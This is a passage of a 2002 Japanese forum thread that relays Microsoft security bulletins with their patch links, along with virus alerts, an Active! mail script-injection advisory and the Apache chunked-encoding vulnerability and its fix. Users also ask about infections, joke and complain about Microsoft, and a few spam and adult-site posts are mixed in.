・ Internet Information Server 4.0 (Windows NT4.0)
http://download.microsoft.com/download/winntsp/Patch/Q321599/NT4/JA/Q321599i.exe
・ Internet Information Services 5.0 (Windows 2000)
・ PC/AT 互換機
http://download.microsoft.com/download/win2000platform/Patch/Q321599/NT5/JA/Q321599_W2K_SP4_X86_JA.exe
・ NEC PC-9800シリーズ
http://download.microsoft.com/download/win2000platform/PatchNEC/Q321599/NT5/JA/Q321599_W2K_SP4_nec98_JA.exe

注意 : この修正プログラムは、IIS 用の累積的な修正プログラムでは
ありません。そのため、最新の累積的な修正プログラム「MS02-018: Internet
Information Services 用の累積的な修正プログラム (Q319733)」を
適用していないユーザーは、最新の累積的な修正プログラムを
適用していただいてから、本修正プログラムを適用いただくことを
推奨します。IIS 用の累積的な修正プログラムは次のセキュリティ情報を
ご覧のうえ適用ください。

MS02-018: Internet Information Services 用の累積的な修正プログラム
(Q319733)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-018.asp
199むむむ ◆MUMUMU4w :02/06/13 11:22 ID:AYnv15hR
■Windows NT4/2000/XP のセキュリティホールに関するパッチ(Q318138)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-029ov.asp

MS02-029 に関する情報
「MS02-029 : リモート アクセス サービスの電話帳の未チェックの
バッファによりコードが実行される (Q318138)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、
悪意のあるユーザーがお客様のコンピュータ上で任意のプログラムを
実行することが出来ます。

対象となる製品
==============
・ Microsoft Windows NT 4.0
・ Microsoft Windows NT 4.0 Terminal Server Edition
・ Microsoft Windows 2000
・ Microsoft Windows XP

修正プログラム
==============
・ Microsoft Windows NT 4.0
・ PC/AT 互換機
http://download.microsoft.com/download/winntsp/Patch/Q318138/NT4/JA/JPNQ318138i.exe
・ NEC PC-9800シリーズ
http://download.microsoft.com/download/winntsp/PatchNEC/Q318138/NT4/JA/JPNQ318138n.EXE
・ Microsoft Windows NT 4.0 Terminal Server Edition
http://download.microsoft.com/download/winntterminal/Patch/Q318138/NT4/JA/JPNQ318138i.exe
・ Microsoft Windows 2000
・ PC/AT 互換機
http://download.microsoft.com/download/win2000platform/Patch/Q318138/NT5/JA/Q318138_W2K_SP3_X86_JA.exe
・ NEC PC-9800シリーズ
http://download.microsoft.com/download/win2000platform/PatchNEC/Q318138/NT5/JA/Q318138_W2K_SP3_nec98_JA.exe
・ Microsoft Windows XP
http://download.microsoft.com/download/whistler/Patch/Q318138/WXP/JA/Q318138_WXP_SP1_x86_JPN.exe
200むむむ ◆MUMUMU4w :02/06/13 11:28 ID:AYnv15hR
■Microsoft SQL Server 2000 クライアントツールにセキュリティホール

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-030ov.asp

MS02-030 に関する情報
「MS02-030: SQLXML の未チェックのバッファによりコードが実行される
(Q321911)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
Microsoft SQLXML にユーザーの入力をチェックする方法に問題があるため、
悪意のあるユーザーに任意のプログラムまたはスクリプトを
実行される可能性がある問題です。

対象となる製品
==============
・ Microsoft SQLXML
SQL Server 2000 または、SQL Server 2000 クライアントツールが
インストールされている環境が対象になります。

確認方法
--------
"\Program Files\Common Files\System\Ole DB" フォルダに次のファイルが
存在する場合、この製品がインストールされています。
・ sqlxml.dll : SQL Server 2000 または、SQL Server 2000
クライアントツールがインストールされている環境
・ sqlxml2.dll : SQLXML Version 2 がインストールされています。
・ sqlxml3.dll : SQLXML Version 3 がインストールされています。

修正プログラム
==============
・ Microsoft SQLXML version shipping with SQL 2000
この修正プログラムは SQL Server 2000 クライアントツール が
インストールされている全ての環境に適用をお願いいたします。
クライアント ツールは、SQL Server 2000 をインストールすると
デフォルトでインストールされます。
注意 : 使用している MDAC のバージョンにより適用する修正モジュールが
違いますのでご注意ください。
・ MDAC 2.6 をご使用の環境
http://download.microsoft.com/download/SQLSVR2000/SQLXML/Q321858/NT45XP/EN-US/Q321858_SQL_Security_MDAC26.exe
・ MDAC 2.7 をご使用の環境
http://download.microsoft.com/download/SQLSVR2000/SQLXML/Q321858/NT45XP/EN-US/Q321858_SQL_Security_MDAC27.exe
・ Microsoft SQLXML version 2
SQLXML Version 2 をご利用のお客様のみ適用をお願いします。
http://download.microsoft.com/download/SQLSVR2000/Patch/Q321460/W98NT42KMe/EN-US/SQLXML2_Q321460.EXE
・ Microsoft SQLXML version 3
SQLXML Version 3 をご利用のお客様のみ適用をお願いします。
http://download.microsoft.com/download/SQLSVR2000/Patch/Q320833/W98NT42KMe/EN-US/SQLXML3_Q320833.EXE
201むむむ ◆MUMUMU4w :02/06/13 11:47 ID:AYnv15hR
玄人志向の最新USB 2.0カードにウイルス混入が判明、回収・交換へ

 玄人志向は13日(木)、先週発売したばかりのUSB 2.0カード「USB2.0V-PCI」の
デバイスドライバ収録CD-ROMにウイルスが混入していたことを明らかにし、その
対応策を同時に発表した。同製品を購入した人は、すぐに玄人志向が推奨する
駆除ツールを使って特定のウイルスを駆除することが必要だ。

 「USB2.0V-PCI」は、VIA製USB 2.0コントローラーVT6202を搭載した初のUSB 2.0
カードとして先週登場したばかりの製品。約2,000円という低価格な点が受け、売れ
行きは順調のようだったが、ウイルス混入が判明した直後に在庫は自主回収され、
現在は店頭から姿を消している。玄人志向ではこの製品を廃番にするとしており、
少なくとも同じブランドでこの製品が再び出回ることはなさそうだ。

 CD-ROMの中に混入していたのは「W32.ElKern.4926」というウイルスで、感染すると
\Windows\Systemフォルダ内の実行形式ファイルすべてに感染しようとするほか、
オープンな共有リソースやマッピングドライブ上のファイルに感染するという感染力の
非常に高いウイルス。同じファイルに繰り返し増殖することで、感染先のファイルを
修復不可能にする可能性があり、最悪の場合はOS自体がクラッシュしてしまう。
(以上、2002年6月13日のAKIBA PC Hotline!より一部引用―全文は引用元を参照)

引用元: http://www.watch.impress.co.jp/akiba/hotline/20020615/etc_usb20v.html
情報発見場所: http://news.2ch.net/test/read.cgi/newsplus/1022446992/266
202むむむ ◆MUMUMU4w :02/06/13 19:29 ID:AYnv15hR
MSN chatのセキュリティパッチが6月11日付けで(密かに)アップデートされている
模様です。ご注意を。

Microsoft Security Bulletin MS02-022

Unchecked Buffer in MSN Chat Control Can Lead to Code Execution (Q321661)
Originally posted: May 08, 2002
Updated: June 11, 2002
^^^^^^^^^^^^^^^^^^^^^^^^

引用元: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-022.asp
203むむむ ◆MUMUMU4w :02/06/13 19:33 ID:AYnv15hR
>>202
パッチの場所です。
確かに、ファイルの作成日時とファイルの大きさが違っていることを確認しました。
しかし、よく見ないと表向きわからないな、これ。

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=39632
204名無しさん@お腹いっぱい。:02/06/13 20:44 ID:???
XPでアップデート出来ない人はACCSに自首して下さい。
205名無しさん@お腹いっぱい。:02/06/14 00:05 ID:???
Windows Update 自体が信用出来ない以上、何をすればいいのか途方に暮れる。
206むむむ ◆MUMUMU4w :02/06/14 00:11 ID:P9PswPOo
■トレンドマイクロ、広告先サイトへ勝手にアクセスするウイルスを警告
http://www.watch.impress.co.jp/broadband/news/2002/06/13/frethem.htm

それほど(今の時点では)重要ではなさそうなので、とりあえずリンクだけ。
207むむむ ◆MUMUMU4w :02/06/14 13:48 ID:JGARLj3y
----------------------------------------------------------------------
SNS Advisory No.54
Active! mail Executing the Script upon the Opening of a Mail Message Vulnerability

Problem first discovered: Fri, 31 May 2002
Published: Wed, 13 June 2002
----------------------------------------------------------------------

概要:
-----
Active! mail には、特定の電子メールヘッダに HTML タグが記述されてい
る場合、これを適切に変換せずにそのまま表示してしまうという問題があり
ます。

詳細:
-----
Active! mail は、株式会社トランスウエア(http://www.transware.co.jp/)
が開発および販売している Web ベースのメールシステムのパッケージ製品
です。
Active! mail には、特定の電子メールヘッダに HTML タグが記述されてい
る場合、これを適切に変換せずにそのまま表示してしまうという問題があり
ます。このため、仮にユーザが受け取った電子メールのヘッダに、<script>
タグを含む悪意のあるスクリプトが埋め込まれていた場合、その電子メール
を表示すると同時にスクリプトが実行され、これにより利用者の Cookie の
情報が漏洩し、攻撃者にWebメールシステムを不正に使用されてしまう等の
被害を受ける恐れがあります。

問題を確認したバージョン:
-------------------------
Active! mail 1.422
Active! mail 2.0

対策:
-----
Active! mail ver.2.0.1.1 へアップデートすることでこの問題を解消する
ことができます。これは以下の URL より入手可能です。

http://www.transware.co.jp/active/download/am_download.html

尚、我々がこの問題を発見し開発元に問い合わせたところ、翌営業日には、
パッチを作成してユーザに配布する予定である旨の連絡を受けました。

発見者:
-------
山崎 圭吾 (LAC)

注意:
-----
このアドバイザリで示される情報は予告なしに改定されることがあり、かつ、
あるがままの形で提供されます。この情報を適用し生起される結果のリスクは
利用者が負うものとし、株式会社ラックは一切の責任を負わないものとします。

再配布について:
---------------
このアドバイザリの再配布は、下記条件を満たす限り自由です。
・発行元 URL として、以下の URL を明記する。
http://www.lac.co.jp/security/intelligence/SNSAdvisory/54.html
208誰か・・・:02/06/15 12:07 ID:I4ReR+4K
うちのPCがウィルスに感染してしまったようです・・
変なメールが来たので削除しようと思って右クリックしたらいきなり
ファイルのダウンロードって出てウィルスをダウンロードしてしまったらしいのです
それからPCの調子が悪くなりフリーズしまくりのネット速度遅くなりまくりです・・・
誰か解決方法を教えてください。
209名無しさん@お腹いっぱい。:02/06/15 12:15 ID:5kGhtnko
駆除すればいいじゃん
210むむむ ◆MUMUMU4w :02/06/15 13:32 ID:yIA8Pbpg
■Gopher関連問題、ISA ServerとProxy Serverのパッチがリリース、IEはまだ

最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027.asp

================================================================
今回の更新内容
この問題に対する以下の製品の修正プログラムを公開しました。
・ ISA Server 2000:
http://www.microsoft.com/downloads/release.asp?ReleaseID=39859

・ Proxy Server 2.0:
http://www.microsoft.com/downloads/release.asp?ReleaseID=39864
================================================================
(中略)
・ Internet Explorer
修正プログラムは現在準備中です。公開され次第、このページでご案内
します。
211名無しさん@お腹いっぱい。:02/06/15 14:35 ID:???
【セキュリティ】JPEG画像に感染するウィルス登場【現状では危険度は低い】
http://slashdot.jp/article.pl?sid=02/06/14/2110206&mode=thread
212名無しさん@お腹いっぱい。:02/06/15 17:25 ID:???
>>208
ネタなんだろうが、マジレス。
トレンドマイクロのオンラインスキャンかけてみそ。
あと AD-Awareというソフトを走らせてみるとお前の知らないところで
情報垂れ流すスパイウェアが沢山見つかるぞ。
213名無しさん@お腹いっぱい。:02/06/15 18:35 ID:???
脆弱性ってなに?
214名無しさん@お腹いっぱい。:02/06/15 21:44 ID:???
>>213
おまえのチンコ。
215名無しさん@お腹いっぱい。:02/06/15 22:41 ID:???
>>214
「未チェックのバッファーがオーバーフロー」するのか?
216名無しさん@お腹いっぱい。:02/06/15 22:59 ID:???
>>215
つまり我慢汁で妊娠したと・・・
217名無しさん@お腹いっぱい。:02/06/15 23:54 ID:???
>>216
結果として、薄い子供が生まれるわけだな。
218JSサイト:02/06/16 06:32 ID:a1ca/87K
219名無しさん@お腹いっぱい。:02/06/16 14:08 ID:???
MS ウェブサーバーにセキュリティーホール
http://www.hotwired.co.jp/news/news/20020613301.html
220名無しさん@お腹いっぱい。:02/06/16 14:24 ID:JIGqcx4i
今度また新しいOS出すんだって?
もっとXPとか2000とかちゃんとしてからにしろよな!
221212さん:02/06/16 14:24 ID:LRtqeiic
オンラインスキャンってどうやってかけるんですか?
222名無しさん@お腹いっぱい。:02/06/16 15:11 ID:???
>>221
http://www.trendmicro.co.jp/hcall/
↑ここでやってください。
223むむむ ◆MUMUMU4w :02/06/16 21:33 ID:???
>>219
これは >>198 の件ですね。
224むむむ ◆MUMUMU4w :02/06/17 11:08 ID:SaYG2PR2
旧聞ですが一応載せておきます。

■「ポスペ」にセキュリティー問題 対策ファイルを提供

 So-netは14日、メールソフトの「ポストペット」にウイルスが侵入する可能性があると
して、安全性強化のプログラムをダウンロードするよう要請した。

 同社によると、一般に普及しているウイルス検知ソフトでは対応できないため、同社
サイトからのダウンロードが必要という。アップデートした場合、送り付けられるウイルス
を除去しやすくなる。

 アップデートが必要なポストペットは、2001(バージョン2.05以前)、キッズ(1.01以前)、
ビアボイス(2.05以前)、DX(1.2以前)、お試し版(2.05以前)の5種類で、いずれもウィン
ドウズ版。マッキントッシュ版、ウィンドウズCE版、携帯端末のポケットポストペット版は
必要ない。
(以上、2002年6月17日の毎日インタラクティブより一部引用―全文は引用元を参照)

引用元: http://www.mainichi.co.jp/digital/network/archive/200206/14/3.html
ポストペットのセキュリティ対策のお知らせ: http://www.postpet.so-net.ne.jp/up206/
225むむむ ◆MUMUMU4w :02/06/17 12:46 ID:SaYG2PR2
■ワールドカップ速報を偽るウイルス発見(2002年6月17日05時04分更新)

 ワールドカップの速報を偽る新種のコンピュータウイルスが発見された。ウイルスは、
「WorldCup News!」という件名、「Read me for more world cup news!」という本文の
メールで届く。発病すると大量のメール送信と大量のファイル落とし込みを行う。各社
の対応は以下のとおり。

【シマンテック】

◆「BAT.WCup@mm」(危険度=1、米国時間6月11日発見)・・・大量メール送信
スクリプトを作成し、大量のファイルを投下するバッチファイル。また、幾つかの
ウイルス対策ソフトのプログラムファイルを削除する。BAT.WCup@mmが実行
された場合、システムの起動に影響が出るおそれがある。添付ファイルは
「Worldcup_score.vbs.」。被害状況:低、ダメージ:低、感染力:低。

詳細と対策=http://www.symantec.com/region/jp/sarcj/data/b/bat.wcup%40mm.html
(以上、2002年6月17日のBUSINESS COMPUTER NEWSより一部引用―全文は引用元を参照)

引用元: http://www.computernews.com/DailyNews/200206170504938291F2.htm
226むむむ ◆MUMUMU4w :02/06/17 23:55 ID:ycJKzBVQ
■IEのまだ開いたままの穴は14個

jbeef曰く、"13日に MS02-028, 029, 030 が出ましたが、スラッシュドット読者諸氏とっては
もはやニュースではない(ご自身で情報を入手されている)ことかと。というわけで、少し古い
ネタで、ご存じの方も少なくないかもしれませんが、こちらをご紹介。 Thor Larholm氏に
よって編集されている「Unpatched IE security holes」によると、欠陥内容がどこかで公表
されていながら適切なパッチがまだリリースされていないIEのセキュリティホールの数は、
現在14個とのこと。Microsoft Officeを入れている場合には4個追加されて合計18個となる
そうだ。
(以上、2002年6月17日のSlashdot Japanより一部引用―全文は引用元を参照)

引用元: http://slashdot.jp/article.pl?sid=02/06/15/060248
http://news.2ch.net/test/read.cgi/newsplus/1024070378/663 にて情報いただきました。
227名無しさん@お腹いっぱい。:02/06/18 00:30 ID:???
>>むむむ ◆MUMUMU4w
毎度の事ながら乙カレー。
会社でNT系の保守員やってるんで参考にしてるよー。
228むむむ ◆MUMUMU4w :02/06/18 11:34 ID:cOBb1vev
■すべてのApache 1.x に脆弱性、Windows版も影響ありの模様

Internet Security Systems Security Advisory
June 17, 2002

Remote Compromise Vulnerability in Apache HTTP Server

Synopsis:

ISS X-Force has discovered a serious vulnerability in the default
version of Apache HTTP Server. Apache is the most popular Web server and
is used on over half of all Web servers on the Internet. It may be
possible for remote attackers to exploit this vulnerability to
compromise Apache Web servers. Successful exploitation may lead to
modified Web content, denial of service, or further compromise.

Affected Versions:

Apache 1.x

Note: Many commercial Web Application Servers such as Oracle 9ias and
IBM Websphere use Apache HTTP Server to process HTTP requests.
Additional products that bundle Apache HTTP Server for Windows may be
affected.
(以上、2002年6月18日のInternet Security Systems(ISS)より一部引用―全文は引用元を参照)

引用元: http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20502
229むむむ ◆MUMUMU4w :02/06/18 11:36 ID:???
>>227
>>228 に書き忘れました。どうも。
私はあくまで公開情報をピックアップしてくるだけなので、取り扱いは各人にてお願いです。
230名無しさん@お腹いっぱい。:02/06/18 12:06 ID:???
☆★ ☆★ ☆★ ☆★ ☆★ ☆★ ☆★ ☆★
マイクロソフトが誤ってウィルスを配付
☆★ ☆★ ☆★ ☆★ ☆★ ☆★ ☆★ ☆★
http://japan.cnet.com/Enterprise/News/2002/Item/020617-2.html
231むむむ ◆MUMUMU4w :02/06/18 14:09 ID:cOBb1vev
>>228 Apache の件の続報。

・CERT Advisoryも出ました。2.x もまずい模様(下記)。
(影響を受けるバージョン)
Web servers based on Apache code versions 1.3 through 1.3.24
Web servers based on Apache code versions 2.0 through 2.0.36

・さきほどのISS のパッチでは対応が不十分な模様。
--- 引用開始
The CERT/CC has been informed by the Apache Software Foundation that the
patch provided in the ISS advisory on this topic does not completely correct
this vulnerability.
--- 引用終了

・Windowsプラットホームではもろに影響を受ける模様。
--- 引用開始
II. Impact
For Apache versions 1.3 through 1.3.24 inclusive, this vulnerability may allow
the execution of arbitrary code by remote attackers. Several sources have reported
that this vulnerability can be used by intruders to execute arbitrary code on
Windows platforms. Additionally, the Apache Software Foundation has reported
that a similar attack may allow the execution of arbitrary code on 64-bit UNIX
systems.
--- 引用終了

引用元: http://www.cert.org/advisories/CA-2002-17.html
232むむむ ◆MUMUMU4w :02/06/18 14:20 ID:cOBb1vev
■Apacheの件の続報

現在、開発元のCVSが激しく更新されている模様。影響はかなり広範囲の模様です。
影響が大きそうなので、N+にもスレ立てました。

正式なパッチは今日の深夜〜明日未明あたりかも。

【ネット】Webサーバソフト「Apache」にセキュリティホール発覚、開発元が緊急対応中
http://news.2ch.net/test/read.cgi/newsplus/1024377470/
233むむむ ◆MUMUMU4w :02/06/19 11:50 ID:jX8oWquX
■Apacheの対策版(1.3.26/2.0.39)がリリース

The Apache Software Foundation and The Apache Server Project are
pleased to announce the release of version 1.3.26 of the Apache HTTP
Server. This Announcement notes the significant changes in 1.3.26.

This version of Apache is principally a security and bug fix
release. A summary of the bug fixes is given at the end of this document.
Of particular note is that 1.3.26 addresses and fixes the issues noted
in CAN-2002-0392 (mitre.org) [CERT VU#944335] regarding a vulnerability
in the handling of chunked transfer encoding. We would like to thank
Mark Litchfield of ngssoftware.com for discovering and reporting the
vulnerability.
---
Apache 2.0.39 Released
---------------------------------------------

The Apache HTTP Server Project is proud to announce the third public
release of Apache 2.0. Apache 2.0 has been running on the Apache.org
website since December of 2000 and has proven to be very reliable.
234 :02/06/19 17:42 ID:???
>>192
じゃあflash見ない方がいいってことですか?
235むむむ ◆MUMUMU4w :02/06/19 19:20 ID:???
>>234
あくまで自己責任にて。ここの情報に限ったことではないですが。
236むむむ ◆MUMUMU4w :02/06/19 22:54 ID:Cd5+M8FZ
■MSNチャットのセキュリティパッチがまた更新される
# ひでーな、、、。

最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-022.asp

================================================================
今回の更新内容
このセキュリティ情報のページを更新し、2002 年 5 月 8 日 (米国日付) に
リリースされた修正が、影響を受ける過去のコントロールが再導入されることに
対して、システムを充分に保護しないことをお知らせしました。また、
アップデートされた修正が利用可能となったことをお知らせしました。

2002 年 5 月 8 日 (米国日付) にリリースされた修正のいずれかを適用している
お客様はアップデートされた修正を適用することを検討して下さい。
================================================================

MSN チャット コントロールの未チェックのバッファによりコードが実行される
(Q321661) (MS02-022)

登録日 : 2002/5/9
更新日 : 2002/6/19

概要 :
このセキュリティ情報の対象となるユーザー : Microsoft(R) MSN チャット
コントロールを使用しているすべてのお客様。(Microsoft(R) MSN チャット
コントロールは直接ダウンロードすることにより利用可能です。また、MSN
Messenger および Exchange Instant Messenger に同梱されています。)

脆弱性の影響 : 攻撃者の選択したコードが実行される

最大深刻度 : 高

推奨する対応策 : アップデートが最初にリリースされた時点で、これらを
インストールしていないお客様は、直ちにアップグレードされたアップデートを
インストールして下さい。最初のアップデートをインストールしたお客様は
アップグレードされたアップデートのインストールを検討して下さい。

影響を受けるソフトウェア :
・ Microsoft MSN チャット コントロール
・ MSN チャット コントロールを含む Microsoft MSN Messenger 4.5 および
4.6
・ MSN チャット コントロールを含む Microsoft Exchange Instant Messenger
4.5 および 4.6

問題 :
技術的な説明 :
2002 年 5 月 8 日 (米国日付)、マイクロソフトはこのセキュリティ情報の最初
のバージョンをリリースしました。2002 年 6 月 11 日 (米国日付)、この
セキュリティ情報を更新し、2002 年 5 月 8 日 (米国日付) にリリースした
修正は、この脆弱性を解決しますが、影響を受けるコントロールが再導入される
場合があることをお知らせしました。このため、影響を受けるコントロールが
再導入されることを確実に防ぐため、新しい修正をリリースします。新しい MSN
チャット コントロール、更新された修正プログラム、MSN Messenger の
アップデートされたバージョンおよび Exchange Instant Messenger の
アップデートされたバージョンが利用可能になりました。2002 年 5 月 8 日
(米国日付) にリリースされた修正のいずれかを適用しているお客様は
アップデートされた修正を適用することを検討して下さい。
237むむむ ◆MUMUMU4w :02/06/20 11:16 ID:7ymBNPv1
■MS02-031: Word2000/2002, Excel2000/2002のセキュリティパッチがリリース

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-031ov.asp

MS02-031 に関する情報

「MS02-031: 2002 年 6 月 19 日 Excel for Windows および Word for
Windows 用の累積的な修正プログラム」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この修正プログラムは、Microsoft Excel 2000、Excel 2002 および
Microsoft Word 2002 に影響を及ぼすセキュリティ上の問題を排除する累積
的な修正プログラムです。 リリース以降に公開された全ての修正プログラム
が含まれ、さらに新しい 4 個の問題を排除します。

対象となる製品
==============
・Microsoft Excel 2000 for Windows
・Microsoft Office 2000 for Windows
・Microsoft Excel 2002 for Windows
・Microsoft Word 2002 for Windows
・Microsoft Office XP for Windows

修正プログラム
==============
・Microsoft Excel 2000 for Windows

・クライアント用修正プログラム
http://download.microsoft.com/download/excel2000/Patch/exc0901/W982KMeXP/JA/Exc0901.exe
・管理者用修正プログラム
http://download.microsoft.com/download/excel2000/Patch/exc0901a/W982KMeXP/JA/Exc0901a.exe

この修正プログラムは Office 2000Service Pack 2 の環境にインストールす
ることができます。

・Microsoft Excel 2002 for Windows

・クライアント用修正プログラム
http://download.microsoft.com/download/Excel2002/Patch/exc1002/W982KMeXP/JA/exc1002.exe

・管理者用修正プログラム
http://download.microsoft.com/download/Excel2002/Patch/exc1002a/W982KMeXP/JA/exc1002a.exe

この修正プログラムは Office XP Service Pack 1 の環境にインストールす
ることができます。

・Microsoft Word 2002 for Windows

・クライアント用修正プログラム
http://download.microsoft.com/download/Word2002/Patch/wrd1004/W982KMeXP/JA/wrd1004.exe
・管理者用修正プログラム
http://download.microsoft.com/download/Word2002/Patch/wrd1004a/W982KMeXP/JA/wrd1004a.exe

この修正プログラムは Office XP Service Pack 1 の環境にインストールす
ることができます。
238名無しさん@お腹いっぱい。:02/06/20 11:33 ID:5XmnkdrJ
現役&元AV女優と○○○できるお店の情報を交換するための掲示板です。
http://jbbs.shitaraba.com/sports/1923/avkafuzoku.html
239むむむ ◆MUMUMU4w :02/06/21 01:49 ID:???
>>237
補足:
Word/Excelともインストール途中でOfficeのCDの挿入を促されることはないようです。
240むむむ ◆MUMUMU4w :02/06/21 01:56 ID:???
>>239
うーむ、デスクトップでは言われなかったのに、ノートPCでは言われた。
環境依存かも。
241170:02/06/21 12:49 ID:???
>240
管理者用のアップデートのやり方は、どっかに出てました?
242むむむ ◆MUMUMU4w :02/06/21 18:24 ID:gQkxrqKm
>>241
昔あったfixのアップデート方法ですが、これと同じでいいと思います。

www.microsoft.com/japan/support/ kb/articles/JP300/5/53.htm
243むむむ ◆MUMUMU4w :02/06/21 18:25 ID:???
>>242
URLのコピペをしくりました。スマソ。
http://www.microsoft.com/japan/support/kb/articles/JP300/5/53.htm
244名無しさん@お腹いっぱい。:02/06/24 18:16 ID:???
>243
thx!
245名無しさん@お腹いっぱい:02/06/24 21:02 ID:pO9E2yW4
>>1
無駄な努力だ。Windows使ってる時点であきらめろ。
ルーター2本刺し+ファイアーウォール構築(フィルタリング)くらいだろ?
他には人間工学的スキルを学ぶことだな。
ウィルス感染にしても実は後者の方が問題なのだよ。
初期設定のままブラウジングして、ウィルスと知らずにクリックするヴァカが後を絶たないよ。
どうしても気になるならMacを使え。
ほとんど意識しなくても大丈夫なレベルにまでセキュリティーが高くなる。
悪意→Mac陽性(Virii潜伏)→Win発症の感染経路にだけ注意すればよい。
246名無しさん@お腹いっぱい:02/06/27 04:13 ID:nO5pkhhI
Norton先生、ドザー完全制覇!
247名無しさん@お腹いっぱい。:02/06/27 11:35 ID:/X4cPHHL
PE.Mtx.A
WORM.MTX.A

という2つのウイルスに感染してしまったのですが、
どうしたら駆除できるのでしょうか?
これらは、重大なウイルスですか?
248名無しさん@お腹いっぱい。:02/06/27 12:40 ID:1MNaNXUs
■Windows Media Playerに新たな脆弱性

米Microsoftは6月26日、Windows Media Player(WMP)に新たに3つの脆弱
性が発見されたと報告した。最悪の場合、攻撃者によるコード実行に悪用
されることがあるという。

同社はこの脆弱性を「深刻度=高」に指定、WMP用の累積パッチをリリース
した。影響を受けるソフトはWMP 6.4、WMP 7.1、WMP for Windows XP。

http://www.zdnet.co.jp/news/0206/27/nebt_13.html
249名無しさん@お腹いっぱい。:02/06/27 12:46 ID:1MNaNXUs
■Microsoft Commerce Server2000/2002に新たな脆弱製

米Microsoftは6月26日、Microsoft Commerce Server2000/2002に、攻撃
者のコード実行を許す4つの脆弱性が発見されたと報告した。「深刻度=高」
に指定されている。Microsoftは同サーバソフトを使うシステム管理者に、た
だちにパッチをインストールするよう促している。

http://www.zdnet.co.jp/news/0206/27/nebt_13.html
250今のうち!:02/06/27 18:34 ID:???
SPAM君の実態
isweb41.infoseek.co.jp/computer/jogdial/c1002s/cgi-bin/upld/imgboard.cgi
251むむむ ◆MUMUMU4w :02/06/28 18:49 ID:???
>>248 >>249
どうもです。今週は私のアクティビティが低いので、助かります。
特に、WMP のやつは絶対当てないといかんですね。
252むむむ ◆MUMUMU4w :02/06/28 18:51 ID:XtH49po2
>>248 の MS からのアナウンス:

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-032ov.asp

MS02-032 に関する情報
「MS02-032: 2002 年 6 月 26 日 Windows Media Player 用の累積的な
修正プログラム (Q320920)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
これは、下記対象となる製品に含まれる 3 つの問題により、
不正なプログラムが実行や権限の昇格が行われる可能性がある問題です。
最悪の場合、悪意のあるユーザーがお客様のコンピュータ上で任意の
プログラムを実行することが出来ます。

対象となる製品
==============
・ Microsoft Windows Media Player 6.4
・ Microsoft Windows Media Player 7.1
・ Microsoft Windows Media Player for Windows XP

修正プログラム
==============
・ Microsoft Windows Media Player 6.4
http://download.microsoft.com/download/winmediaplayer/Update/320920/W98NT42KMe/JA/wm320920_64.exe
・ Microsoft Windows Media Player 7.1
http://download.microsoft.com/download/winmediaplayer/Update/320920/W982KMe/JA/wm320920_71.exe
・ Microsoft Windows Media Player for Windows XP
http://download.microsoft.com/download/winmediaplayer/Update/320920/WXP/JA/wm320920_8.exe
253むむむ ◆MUMUMU4w :02/06/28 18:51 ID:XtH49po2
続いて >>249 の MS からのアナウンス:

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-033ov.asp

MS02-033 に関する情報
「MS02-033 : プロファイル サービスの未チェックのバッファにより Commerce
Server でコードが実行される (Q322273) 」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、下記対象となる製品に含まれる未チェックのバッファにより、
不正なプログラムが実行される可能性がある問題です。最悪の場合、悪意の
あるユーザーがお客様のコンピュータ上で任意のプログラムを実行することが
出来ます。

対象となる製品
==============
・ Microsoft Commerce Server 2000
・ Microsoft Commerce Server 2002

Commerce Server 2000/2002 をインストールしている全てのシステムが影響を
受けます。

修正プログラム
==============
・ Microsoft Commerce Server 2000
http://download.microsoft.com/download/comserver/Patch/1.1/NT5/JA/Q322273_JA.exe
・ Microsoft Commerce Server 2002
http://download.microsoft.com/download/commerceserver2002/Patch/1.1/NT5/JA/Q322273_CS2002_JA.exe
254CHANCE FOR EVERYONE:02/06/28 19:00 ID:st+XFGjG
落合信彦は、 今は、1000年に一度の変革期だと発言している。
すべては変わる。時代は変わった。
といったのは、堺屋太一。
この変革期はチャンスでもあります。
あなたも、チャンスをここからスタートさせませんか?
http://ailove22.fc2web.com/lpd/index.html
このウェブを読んで考えてみてください
かき食えば、金が鳴るなり、法隆寺。
書き加えれば、金が生るなり、ホームページ。
255名無しさん@お腹いっぱい:02/06/29 10:58 ID:W8feG1di
変革期には耕耘機が似合う
256名無しさん@お腹いっぱい:02/06/29 23:21 ID:suf3DMWM
しかしマイクロソフトの製品はセキュリティーの脆弱性はひどいな。
こんなソフトウェアを公開実験してる時点ですでに犯罪だよ。
と思ったら、今度はWindowsMediaPlayerで深刻度「高」だって。ヤレヤレ
どうせまたWindowsバンドルと独自規格の採用で、
MS製の劣った製品を標準にしようと画策してるんだろうけど、
MPEG-4に勝利してもらいたいよね。
257名無しさん@お腹いっぱい:02/06/29 23:28 ID:suf3DMWM
それにしてもWindowsプラットフォームは、
ここ最近、ウィルスだのセキュリティーだのと問題がちょっと多すぎるぞ。
市場に対して唯一圧倒的な独占商品なんだから、もうちょっと何とかならんものかね?
つーかなんで独自規格を拡張→規格無視→Windowsにバンドル→裁判→数年後デファクトスタンダードするわけ?
いつもこの手で不当競争を仕掛ける史上最悪の独占企業だよ。
マイクロソフトなんか潰れちゃえ!
ここの社員も最悪。
258名無しさん@お腹いっぱい。:02/06/29 23:52 ID:???
バグが多すぎて、IE6.0SP1がリリース出来ないんだと。
